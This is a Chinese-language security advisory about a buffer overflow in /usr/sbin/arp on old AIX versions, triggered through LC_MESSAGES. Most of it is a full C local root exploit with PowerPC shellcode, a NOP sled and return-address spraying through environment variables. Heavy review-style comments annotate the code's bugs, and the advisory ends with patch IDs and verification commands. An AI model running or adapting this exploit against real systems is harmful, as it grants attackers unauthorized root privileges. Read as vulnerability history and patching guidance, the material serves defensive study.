AIX 4.1.4.0 LC_MESSAGES 溢出漏洞

作者:cripto (cripto@SUBTERRAIN.NET)
日期:2000-05-05


发布日期: 2000-5-8
更新日期: 2000-5-9

受影响的系统:  
AIX 3.2
AIX 4.1.4.0
AIX 4.2

不受影响系统:  
AIX 4.3


--------------------------------------------------------------------------------
描述:

在AIX 4.1.4.0中,将环境变量LC_MESSAGES设置为一个很长的字符串后再执行/usr/sbin/arp,
会导致缓冲区溢出,本地攻击者可借此获得root权限。

<* 来源: cripto (cripto@SUBTERRAIN.NET) *>



--------------------------------------------------------------------------------
测试程序:


/*
* AIX 4.1.4.0 local root /usr/sbin/arp exploit - SSG-arp.c - 06/06/2000
*
* This code is largely from an old AIX mount exploit by Georgi Guninski.
* Tested on a blazing 33Mhz RS/6000 IBM POWERserver 340!
*
* Shouts to bind, xdr, obecian, qwer7y, interrupt, linda, and ur mom.
*
* -cripto .o0-> SSG ROX 2000 !@#$$#@! <-0o.
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>


#define OFFSET 3580


/* Program to launch and the argv[0] it is given. Kept as fixed-size
 * writable arrays (not string literals) because they are passed to
 * execve() as plain char pointers. */
char prog[100]  = "/usr/sbin/arp";
char prog2[30]  = "arp";

/* Declared without a prototype (no <unistd.h> is included); main() only
 * takes its address and never calls it. */
extern int execv();


/*
 * Allocate a "name=value" entry, register it with putenv(), and return it.
 *
 * name:  variable name, NUL-terminated, non-NULL.
 * value: variable value, NUL-terminated, non-NULL — strlen() on NULL is
 *        undefined behaviour, so callers passing getenv() output must check
 *        for NULL themselves.
 * Returns the heap buffer handed to putenv(). It is deliberately never freed
 * here: putenv() keeps the pointer itself rather than a copy, so the buffer
 * must outlive the environment entry.
 * On allocation failure reports via perror("malloc") and exits with status 2.
 */
char *createvar(char *name,char *value)
{
  /* '=' plus the terminating NUL need 2 bytes; 4 keeps the original slack. */
  size_t need = strlen(name) + strlen(value) + 4;
  char *entry = malloc(need);

  if (entry == NULL)
  {
    perror("malloc");
    exit(2);
  }

  /* One bounded format call replaces the strcpy/strcat chain; `need` is
   * always large enough, so nothing is truncated. */
  snprintf(entry, need, "%s=%s", name, value);
  putenv(entry);
  return entry;
}


/*
 * Entry point. Builds two word buffers (buf, frame), exports them through
 * several environment variables, and execve()s prog with that environment.
 * The return type is implicit int (pre-C99 style) and the third parameter
 * `env` is never read — the environment is rebuilt in `newenv` instead.
 *
 * argv[1], if present, overrides the address adjustment `corr`; otherwise
 * OFFSET is used. execve() is called with no prototype in scope
 * (<unistd.h> is not included), so it is implicitly declared.
 */
main(int argc,char **argv,char **env)
{
  /* Payload words. The trailing 0x0 acts as a terminator so the array can be
   * measured and copied with strlen()/strcpy() below; that only works while
   * no earlier byte of the array is zero. */
  unsigned int code[]={
  0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
  0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
  0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
  0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
  0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
  0x7c0903a6 , 0x4e800420, 0x0
  };


  #define MAXBUF 600
  unsigned int buf[MAXBUF];
  unsigned int frame[MAXBUF];
  unsigned int i,nop,mn;
  int max;
  int QUIET = 0;      /* never changed: the puts()-only path below is dead code */
  int dobuf = 0;      /* unused */
  char VAR[30] = "LC_MESSAGES";   /* name of the variable that receives frame */
  unsigned int toc;
  unsigned int eco;
  unsigned int *pt;
  char *t;            /* unused */
  int egg = 1;        /* unused */
  int ch;             /* unused */
  unsigned int reta;
  int corr = 4604;    /* overwritten unconditionally by the if/else below */
  char *args[4];
  char *newenv[8];
  int justframes = 1; /* never changed: VAR always receives frame, not buf */
  int startwith = 0;  /* never changed: selects the second arm of every ?: below */


  mn = 78;            /* number of filler words placed before the payload */
  max = 100;          /* number of words of buf actually used */


  if (argc > 1)
  {
    corr = atoi(argv[1]);   /* atoi() reports no errors; non-numeric input yields 0 */
  }
  else
  {
    corr = OFFSET;
  }


  /* Read the two words found at the address of execv. NOTE(review): this
   * assumes &execv points at a two-word descriptor rather than at code —
   * confirm against the target ABI before relying on it. */
  pt = (unsigned *) &execv;
  toc = *(pt+1);
  eco = *pt;


  /* Bound check: filler + payload words must fit in max, and max in buf.
   * perror() is used for a condition that did not set errno, so the text it
   * appends is whatever errno happened to hold. */
  if (((mn + strlen((char*)&code) / 4) > max) || (max > MAXBUF))
  {
    perror("invalid input");
    exit(1);
  }


  /* Patch four 16-bit halves of code with toc and eco (high half at the
   * lower index). Writing through an unsigned short * into an unsigned int
   * array is type punning that violates strict aliasing; memcpy() would be
   * the well-defined form. The half ordering assumes the build host's byte
   * order matches the target's. */
  #define OO 7
  *((unsigned short *)code + OO + 2) = (unsigned short) (toc & 0x0000ffff);
  *((unsigned short *)code + OO) = (unsigned short) ((toc >> 16) &
    0x0000ffff);
  *((unsigned short *)code + OO + 8 ) = (unsigned short) (eco & 0x0000ffff);
  *((unsigned short *)code + OO + 6 ) = (unsigned short) ((eco >> 16) &
    0x0000ffff);


/* startwith is 0, so reta is always (unsigned)&buf[0] + corr. Casting a
 * pointer to unsigned int truncates wherever pointers are wider than 32 bits. */
reta = startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0] + corr;


  /* With startwith == 0 the first mn words are all the constant 0x4ffffb82. */
  for(nop = 0;nop < mn;nop++)
    buf[nop] = startwith ? reta : 0x4ffffb82;


  /* Append code (treated as a byte string) after the filler; i becomes the
   * index of its last word. Both calls depend on the 0x0 terminator in code. */
  strcpy((char*)&buf[nop], (char*)&code);
  i = nop + strlen( (char*) &code)/4-1;


  /* Intended to reject a reta containing a zero byte. Only the first term is
   * a bitwise mask; the other three use logical && (`reta && 0xff00` is 1 for
   * any non-zero reta), so those three terms can never trigger. */
  if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
    || !(reta && 0xff000000))
  {
    perror("Return address has zero");   /* errno is not set here either */
    exit(5);
  }


  /* Fill buf up to max with reta, then terminate. Because of the
   * post-increment the first write lands at buf[i+1] and the terminator at
   * buf[max+1]; both are within MAXBUF for max == 100. */
  while(i++ < max)
  buf[i] = reta;
  buf[i] = 0;


  /* frame: max-1 copies of reta followed by a terminating 0. */
  for(i = 0;i < max-1;i++)
  frame[i] = reta;
  frame[i] = 0;


  if(QUIET)   /* dead: QUIET is the constant 0 */
  {
    puts((char*)&buf);
    fflush(stdout);
    exit(0);
  };


  /* Build the new environment. Both buffers are passed as C strings, so each
   * is read only up to its first zero byte. getenv("DISPLAY") returns NULL
   * when DISPLAY is unset, and createvar() calls strlen() on its value
   * unchecked — undefined behaviour (typically a crash) in that case. */
  newenv[0] = createvar("EGGSHEL", (char*)&buf[0]);
  newenv[1] = createvar("EGGSHE2", (char*)&buf[0]);
  newenv[2] = createvar("EGGSHE3", (char*)&buf[0]);
  newenv[3] = createvar("EGGSHE4", (char*)&buf[0]);
  newenv[4] = createvar("DISPLAY", getenv("DISPLAY"));
  newenv[5] = VAR[0] ? createvar(VAR,justframes ? (char*)&frame :
    (char*)&buf):NULL;   /* VAR[0] != 0 and justframes == 1: LC_MESSAGES=frame */
  newenv[6] = NULL;


  /* args[1..3] are never assigned, so the argv handed to execve() is not
   * NULL-terminated — reading past args[0] is undefined behaviour. On
   * success execve() does not return; reaching perror() means it failed. */
  args[0] = prog2;
  execve(prog,args,newenv);
  perror("execve\n");
}




--------------------------------------------------------------------------------
建议:
AIX已提供相应的补丁:

AIX 3.2.5
=========
    应当安装下列PTF:
    PTFs - U447656 U447671 U447676 U447682 U447705 U447723  (APAR IX67405)

    运行下列命令检查你的系统是否已安装这些补丁:
    

       lslpp -lB U447656 U447671 U447676 U447682 U447705 U447723

AIX 4.1
=======

    应当安装下列补丁:

        APAR - IX67407

    运行下列命令检查你的系统是否已安装该APAR:

       instfix -ik IX67407

    或者运行下列命令:

       lslpp -h bos.rte.libc

    你的bos.rte.libc版本应为4.1.5.7或更高

AIX 4.2
=======

    应当安装下列补丁:

        APAR - IX67377

    运行下列命令检查你的系统是否已安装该APAR:

       instfix -ik IX67377

    或者运行下列命令:

       lslpp -h bos.rte.libc

    你的bos.rte.libc版本应为4.2.0.11或更高


